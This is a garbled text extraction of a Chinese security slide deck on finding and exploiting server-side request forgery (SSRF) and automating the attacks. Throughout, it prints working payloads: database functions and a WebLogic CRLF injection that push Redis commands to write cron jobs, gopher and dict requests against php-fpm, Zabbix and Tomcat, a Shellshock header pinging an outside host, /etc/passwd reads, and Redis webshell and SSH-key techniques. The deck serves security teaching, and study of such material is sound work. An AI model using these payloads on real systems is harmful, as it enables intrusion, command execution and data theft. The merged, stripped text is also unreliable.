SSRF系統(tǒng)漏洞技術(shù)分析

1、Build Your SSRF Exploit FrameworkSSRF系統(tǒng)漏洞技術(shù)分析議程KNOW IT什么是SSRF能用SSRF做什么如何找到SSRF漏洞HOW如何自動化利用能與SSRF結(jié)合的漏洞列表總結(jié)HACK IT如何利用SSRF漏洞突破限制的方法些利用技巧利用個可以發(fā)起網(wǎng)絡(luò)請求的服務(wù)， 當(dāng)做跳板來攻擊其它服務(wù)。最常見的例子：通過 Web Interface 請求受保護(hù)網(wǎng)絡(luò)內(nèi)的資源。KNOW IT, 什么是SSRF?0:8080/manager/images/tomcat.gifKNOW IT,SSRF有什么能耐？允許 80 & 8080 端口SSRF_InterfaceRedis

2、server客戶端APP serverHTTP server穿越網(wǎng)絡(luò)防火墻的通行證能用SSRF做什么？掃描內(nèi)部網(wǎng)絡(luò)( FingerPrint )向內(nèi)部 任意主機 的 任意端口 發(fā)送 精心構(gòu)造的數(shù)據(jù)包 PayloadDOS( 請求大文件,始終保持連接 Keep-Alive Always )暴力窮舉( users / dirs / files )服 務(wù) 器數(shù) 據(jù) 庫辦 公 網(wǎng)SSRF Request網(wǎng) 絡(luò) 邊 界MongoDBMemCacheRedis-Server有 錢 人 的內(nèi) 網(wǎng)殺傷鏈但是漏洞并不能100%被利用,有兩種情況會產(chǎn)生阻礙服務(wù)端開啟OpenSSL無法進(jìn)行交互利用服務(wù)端需要鑒權(quán)信息

3、 (Cookies & User:Pass) 不能完美利用服務(wù)端開啟OpenSSL無法交互利用 TSL傳輸層安全客戶端SSL服務(wù)器我受OpenSSL保護(hù) 你得按照我的規(guī)則來按照你的規(guī)則生成數(shù)據(jù) 再用證書加密發(fā)送給你校驗數(shù)據(jù)通過 允許訪問HELLO 我要訪問你需要鑒權(quán)信息不能完美利用 服務(wù)端需要認(rèn)證WEB SERVER來人喂公子吃餅Cookies, USER & PASS沒餅,棒棒糖行不?滾!只能找不要餅的了 并附帶了1024陀*試圖DOS公子KNOW IT, 怎么找到SSRF漏洞？能夠?qū)ν獍l(fā)起網(wǎng)絡(luò)請求的地方,就可能存在SSRF漏洞。從遠(yuǎn)程服務(wù)器請求資源( Upload from URL, Im

4、port & Export RSS feed)數(shù)據(jù)庫內(nèi)置功能(Oracle、MongoDB、MSSQL、Postgres、CouchDB)Webmail 收取其它郵箱郵件 (POP3/IMAP/SMTP)文件處理,編碼處理,屬性信息處理(ffpmg, ImageMaic, DOCX, PDF,XML處理器)從遠(yuǎn)程服務(wù)器請求資源 - 找SSRF漏洞Upload from URLDiscuz!Import & Export RSS feedWeb Blog使用了XML引擎對象的地方Wordpress xmlrpc.php使用了XML引擎的地方 - 找SSRF漏洞XXE 實體引用DTD 文檔類型定義

5、XLST - XML文檔轉(zhuǎn)換為其他格式XSLT Processor (Saxon)XSLTTemplateXMLOutput FilesXML Fuzz Cheatsheet (模糊測試表)DTD Remote Access 文檔結(jié)構(gòu)標(biāo)準(zhǔn)XML External Entity 外部實體引用URL Invocation URL 調(diào)用testXML Encryption XML 加密XML Fuzz Cheatsheet Web Services 標(biāo)準(zhǔn)項XML Signature XML簽名WS Policy SOA WS策略項/to/rtoFrom WS Security JAVA WEB 安全

6、策略WS Addressing Web Services 消息尋址XML Fuzz Cheatsheet 第三方應(yīng)用與新協(xié)議WS Federation Web Services通用標(biāo)準(zhǔn)/inc/iss/mexODATA (edmx) 新協(xié)議XBRL 財務(wù)報告標(biāo)準(zhǔn)STRATML 策略標(biāo)記語言/stml數(shù)據(jù)庫內(nèi)置功能(MongoDB) - 找SSRF漏洞 db.copyDatabase(helo,test,66:22);errmsg : “helo.systemnamespaces failed: db.copyDatabase(helo,test,66:9999);errormsg : coul

7、dnt connect to server 66:9999root10-6-4-166 # nc -l -vv 6379 Connection from 44 port 6379 tcp/* config set dbfilename wyssrfquit.spaces db.copyDatabase(rnconfig set dbfilename wyssrfrnquitrn,test,66:6379)互聯(lián)網(wǎng)開放了50000+不需要授權(quán)訪問的MongoDB Server變廢為寶的未授權(quán)訪問數(shù)據(jù)庫內(nèi)置功能(Oracle) - 找SSRF漏洞UTL_HTTPUTL_TCPUTL_SMTP/cd/

8、E11882_01/appdev.112/e40758/u_http.htm數(shù)據(jù)庫內(nèi)置功能(PostgresSQL) - 找SSRF漏洞dblink_send_query() 發(fā)起遠(yuǎn)程查詢SELECT dblink_send_query( host=dbname=quituser=rnconfig set dbfilename wyssrfrnquitrn password=1 port=6379 sslmode=disable,select version(););https:/www.postgr/docs/8.4/static/dblink.html服務(wù)器回顯rootlocalhost

9、# nc -l -vv 6379 Connection from port 6379 tcp/* config set dbfilename wyssrfquit數(shù)據(jù)庫內(nèi)置功能(MSSQL) - 找SSRF漏洞OpenRowset()SELECT openrowset(SQLOLEDB, server=;uid=sa;pwd=sa;database=master)/zh-cn/library/ms190312.aspxSELECT * FROM OpenDatasource(SQLOLEDB,Data Source=ServerName;User ID=sa;Password=sa ) .No

10、rthwind.dbo.CategoriesOpenDatasource()協(xié)議限制:窮舉用戶口令XP_CMDSHELL數(shù)據(jù)庫內(nèi)置功能(CouchDB) - 找SSRF漏洞HTTP API /_replicatePOST http:/couchdb-server:5984/_replicate Content-Type: application/jsonAccept: application/jsonsource : recipes,target : “dict:/:6379/flushall”,/en/stable/api/server/common.htmlWebmail 收取其它郵箱郵件

11、 (POP3/IMAP/SMTP) - 找SSRF漏洞QQ郵箱163/126郵箱新曳郵箱文件處理,編碼處理,屬性信息處理 - 找SSRF漏洞FFmpeg concat:/header.y4m|file:/etc/passwdImageMagick (mvg 語法 URL函數(shù)向服務(wù)器發(fā)起HTTP請求) fill url()XML parsers ( XSLT ) XSLT 包含了超過 100 個內(nèi)置函數(shù)document(): 用來訪問另個xml文檔內(nèi)的信息include(): 用來將兩個樣式表合并import(): 用來將個樣式表覆蓋另個網(wǎng)盤 & 郵箱系統(tǒng)PDF、DOCX 在線編輯 文件自動預(yù)覽

12、HACK IT,怎么利用SSRF漏洞漏洞利用的條件需成功發(fā)送針對目標(biāo)服務(wù)漏洞的數(shù)據(jù)包payload。漏洞利用遇到限制如何繞過?IP限制繞過 (xip.io、十進(jìn)制IP、八進(jìn)制IP)協(xié)議限制繞過 (Redirect、CRLF header injection)調(diào)用系統(tǒng)支持的協(xié)議和方法 (Protocols & Wrappers)HACK IT, 怎么利用SSRF漏洞 & 利用技巧遠(yuǎn)程服務(wù) 本地服務(wù) 數(shù)據(jù)庫XXE - SSRF - CSRF 組合拳利用技巧要求URI對象必須包含域名Domain,且符合.tld標(biāo)準(zhǔn)url=http:/www.0.xip.io (wooyun-2010-0162607

13、 知乎)將10 / 172 / 192 / 127 開頭的私有IP列入黑名單 十進(jìn)制IP*256*3 + *256*2 + *256八進(jìn)制IP 00 = 0只允許 startswith(http) 傳入302 Redirect 兆轉(zhuǎn)CRLF ( Ascii Code ) header injection在利用漏洞的過程中,有哪些限制需要繞過?%20 - 0 x20 - 空格%23 - 0 x23 - #%0d - 0 x0d - CR r%0a - 0 x0a- LF n%08 - 0 x08 - BS%00 - 0 x00 - Null ByteASCII表SSRF漏洞利用 - 302兆轉(zhuǎn)實

14、現(xiàn)協(xié)議轉(zhuǎn)換/forum.php?mod=ajax&action=downremoteimg&message= img/302.php?helo.jpg/imgDICT Scheme/bugs/wooyun-2010-0215779WebLogic SSRF HTTP頭注入 漏洞利用實例 (神洞)CRLF -ASCII Code- %0d - 0 x0d- r 回車- %0a - 0 x0a - n 換行http:/localhost:7001/uddiexplorer/ SearchPublicRegistries.jsp? operator=/helo& rdoSearch=name&btn

15、Submit=SearchCRLF Header Injection HTTP頭注入WebLogic uddiexplorer SSRFPOST /helo HTTP/1.1Content-Type: text/xml; charset=UTF-8 User-Agent: Java1.6.0_11Host: Connection: Keep-Alive%/helo%0d%0aWebLogic SSRF 漏洞利用 CRLF HTTP頭注入(0-day)operator=/helo%20 HTTP/1.1%0d%0a(rn)HOST: %0d%0a(rn)root # nc -l 80 POST

16、/helo HTTP/1.1HOST: User-Agent: Java1.6.0_11 Host: operator=:6379/helo%0d%0a(rn)config set dir /etc/cron.d/%0d%0a(rn) quit%0d%0a(rn)root # nc -l 6379 POST /heloconfig set dir /etc/cron.d/ quitHTTP/1.1案例1案例2operator=:21/%08%08%08%08%08%08%0d%0aUSER ftp%0d%0a PASS ftp%0d%0a pwd%0d%0aGET /abc%0d%0aSHEL

17、LSHOCKPOST /cgi-bin/test-cgi%0d%0aUser-Agent: () foo;echo;/bin/ping cloudeye.me%0d%0a HTTP/1.1WebLogic SSRF 漏洞利用方法服務(wù)端日志W(wǎng)ebLogic SSRF 服務(wù)探測 (FingerPrint)請求開放的服務(wù)信息泄露：/uddi/uddilistener請求未開放的服務(wù)weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http:/:22/helo which

18、 did not have a valid SOAP content-type: null.weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: 1 addresses, but could not connect over HTTP to server: , port: 88weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: / which did not have a va

19、lid SOAP content-type: text/html; charset=UTF-8.可被識別的回顯不可被識別的回顯weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: :22 which did not have a valid SOAP content-type: null.DEMO : WebLogic SSRF CRLF + RedisWebLogic自帶的SSRF不算是漏洞,大部分企業(yè)這樣認(rèn)為銀行、金融、證券行業(yè)：80%電力、能源行業(yè)： 70%國家

20、基礎(chǔ)設(shè)施 & 政府： 90%BEA & Oracle WebLogic在行業(yè)中的使用占比SSRF漏洞利用 - 系統(tǒng)支持的Protocols & WrappersResin-Doc 任意文件讀取/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=gopher:/_hiAtlassian Confluence 任意文件讀取(CVE-2015-8399)/spaces/viewdefaultdec

21、orator.action?decoratorName=./WEB-INF/web.xml & /etc/passwd/spaces/viewdefaultdecorator.action?decoratorName=file:/etc/passwd/spaces/viewdefaultdecorator.action?decoratorName=gopher:/_hi支持絕對路徑PHP/manual/en/wrappers.phpJava tocol.*file ftp gopher http https jar mailto netdocSSRF漏洞利用 - 系統(tǒng)支持的Protocols

22、& Wrappersfile:/ Accessing local filesystem http:/ Accessing HTTP(s) URLs ftp:/ Accessing FTP(s) URLsphp:/ Accessing various I/O streams zlib:/ Compression Streamsdata:/ Data (RFC 2397)glob:/ Find pathnames matching pattern phar:/ PHP Archivessh2:/ Secure Shell 2rar:/ RAR expect:/ Process Interactio

23、n StreamsUDP 協(xié)議SSRF漏洞利用 - 遠(yuǎn)程服務(wù)tftp ftp telnet dict ldap ldaps http file https ftps scp sftpHTTP 協(xié)議GET /path HTTP/1.1 POST /path HTTP/1.1WebDav:PUT MOVE DELSMBreplay & BadTunnelUNC Call:0c$boot.iniFTP & SMTP & POP3t0/get heloTomcat ManagementZabbix AgentdNagios AgentdFastcgi ( php-fpm )腦洞1 - 利用SSRF攻擊

24、本地服務(wù)dict:/localhost:8005/SHUTDOWN%0d%0adict:/localhost:10050/vfs.file.regexp/etc/hosts,7 ZBXD? localhost dict:/localhost:10050/system.runlsZBXD,usr etc var bootgopher:/localhost:9000/_.PHP_VALUE allow_url_include = On腦洞 2 - 利用SSRF漏洞攻擊數(shù)據(jù)庫 & 緩存RedisMemcachedCouchDBREDIS的6種利用方法保存到www目錄 ,創(chuàng)建webshell創(chuàng)建SSH

25、 authotrized_keys文件寫計劃任務(wù)(/var/spool/cron/ & /etc/cron.d/)slave of 主從模式利用寫入到/etc/profile.d/ 用戶環(huán)境變量開啟AOF持久化純文本記錄 appendfilename利用內(nèi)存中的數(shù)據(jù),讀取管理員Session,修改adminid=管理員 模板內(nèi)容緩存在Memecached,修改模板注入JS/html,或者.vBulletin 遠(yuǎn)程命令執(zhí)行 ( 修改Memcached模板緩存 ) /papers/8261Discuz遠(yuǎn)程命令執(zhí)行 ( 修改Redis & Memcached模板緩存 )/bugs/wooyun-20

26、16-0213982利用SSRF漏洞攻擊MemcachedJannock能夠發(fā)起SSRF請求,HTTP /_replicate API又可以被SSRF攻擊,Restful的API接口curl -X PUT :5984/_config/query_servers/cmd -d /sbin/ifconfig /tmp/6666利用SSRF漏洞攻擊CouchDB黑客竊取美國1億5400萬選民的投票記錄 CouchDB腦洞3 XXE - SSRF - CSRF 組合方法CoreMail 提供個綁定在內(nèi)部IP的高權(quán)限API/apiws/services/API?wsdl可以創(chuàng)建&刪除用戶、修改超級管理員

27、密碼還有很多很多未被發(fā)掘的方法.CoreMail前臺存在個XML XXE SSRF漏洞利用SSRF請求外部無法訪問的高權(quán)限API/bugs/wooyun-2010-0192796applychenAsuriHOW,如何將漏洞利用自動化?我們不生產(chǎn)漏洞,只是漏洞的搬運工。基于Pythonfurl / requests / multiprocessing / time / re /content/23255服務(wù)指紋識別 時間差盲測根據(jù)回顯內(nèi)容進(jìn)行判斷利用漏洞整理分類協(xié)議 (http 、dict、gopher、tftp)How 打造自動化利用腳本時間差盲猜Keep-Alive: timeout=5 :6379直保持連接 Keep-Alive http & dict:/:6379傳完數(shù)據(jù), 自動斷開根據(jù)回顯內(nèi)容rootlocalhost # curl :22 SSH-2.0-OpenSSH_5.3Protocol mismatch.服務(wù)指紋識別 db.copyDatabase(helo,test,66:22);errmsg : “helo.systemnamespaces failed: db.copyDatabase(helo,test,66:6379);errormsg :